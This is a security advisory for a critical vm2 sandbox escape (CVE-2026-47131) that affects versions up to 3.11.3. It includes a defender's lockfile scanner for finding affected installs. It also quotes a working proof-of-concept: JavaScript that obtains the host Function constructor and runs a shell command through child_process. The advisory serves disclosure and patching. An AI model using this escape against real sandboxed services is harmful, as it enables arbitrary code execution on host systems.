CVSS 3.1 score: 10.0

CVE-2026-47131: vm2 Sandbox Escape allows Arbitrary Code Execution

GHSA-v6mx-mf47-r5wg CVE-2026-47131
Summary

A vulnerability in the vm2 library allows an attacker who can supply code to the sandbox to escape it and run arbitrary code on the host system, which could lead to unauthorized access or data theft. To protect against this vulnerability, consider updating to the latest version of the vm2 library or using a secure alternative.

What to do
  • Update GitHub Actions vm2 to version 3.11.4.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|-----------|--------|---------|-------------------|
| npm | GitHub Actions | vm2 | <= 3.11.3 |
Fix: upgrade to 3.11.4
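The affected range above is a plain version comparison, so an inventory check can be automated. The following is an added, defender-side example (not code from the advisory or the vm2 project) that scans an npm package-lock.json (lockfileVersion 2 or 3, where every install is a key under "packages" ending in "node_modules/vm2") and reports each vm2 install that is still at or below 3.11.3, including nested copies pulled in by other dependencies. The sample lockfile embedded in it is constructed for the demonstration.

```javascript
// Added example (not from the advisory): find vm2 installs in a lockfile whose
// version is within the affected range (<= 3.11.3) and name the upgrade target.

const AFFECTED_MAX = "3.11.3"; // from the advisory: vm2 <= 3.11.3 is affected
const FIXED = "3.11.4";        // from the advisory: upgrade target

// Compare two dotted versions numerically; returns -1, 0 or 1.
// When the numeric cores are equal, a version carrying a pre-release tag
// (e.g. 3.11.4-rc.1) sorts below the bare release, as semver specifies.
function compareVersions(a, b) {
  const [coreA, ...preA] = a.split("-");
  const [coreB, ...preB] = b.split("-");
  const pa = coreA.split(".").map(Number);
  const pb = coreB.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  if (preA.length && !preB.length) return -1;
  if (!preA.length && preB.length) return 1;
  return 0;
}

// True when the installed version falls inside the advisory's affected range.
function isAffected(version) {
  return compareVersions(version, AFFECTED_MAX) <= 0;
}

// Walk the lockfile's "packages" map and report every vm2 install found,
// top-level or nested under another package's node_modules.
function findVm2Installs(lockfile) {
  const packages = lockfile.packages || {};
  const hits = [];
  for (const [path, entry] of Object.entries(packages)) {
    if (path === "node_modules/vm2" || path.endsWith("/node_modules/vm2")) {
      hits.push({ path, version: entry.version, affected: isAffected(entry.version) });
    }
  }
  return hits;
}

// Constructed sample lockfile: the top-level vm2 is already on the fixed
// version, but a plugin still carries its own nested, affected copy.
const sampleLockfile = {
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app", version: "1.0.0" },
    "node_modules/vm2": { version: "3.11.4" },
    "node_modules/some-plugin": { version: "2.0.0", dependencies: { vm2: "^3.9.0" } },
    "node_modules/some-plugin/node_modules/vm2": { version: "3.9.19" },
  },
};

if (typeof require !== "undefined" && require.main === module) {
  for (const hit of findVm2Installs(sampleLockfile)) {
    const verdict = hit.affected ? `AFFECTED, upgrade to ${FIXED}` : "ok";
    console.log(`${hit.path}@${hit.version}: ${verdict}`);
  }
}
```

Nested copies are the usual blind spot: `npm ls vm2` and this scan both surface them, whereas looking only at the top-level package.json pin would report the project as fixed. Replace `sampleLockfile` with `JSON.parse(fs.readFileSync("package-lock.json"))` to run it against a real project.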
Original title
vm2 has a Sandbox Escape issue
Original description
### Summary
By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox.
This allows attackers to run arbitrary code.

### PoC
```js
"use strict";

const { VM } = require("vm2");
const vm = new VM();

vm.run(`
"use strict";

const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");

async function f() {
  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    setProto.call(getProto.call(e), null);
  }

  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    const HostFunction = e.constructor.constructor;
    new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
  }
}

f();
`);
```

### Impact
Sandbox Escape → RCE
GHSA CVSS 3.1 score: 10.0
Vulnerability type
CWE-913
Published: 29 May 2026 · Updated: 29 May 2026 · First seen: 29 May 2026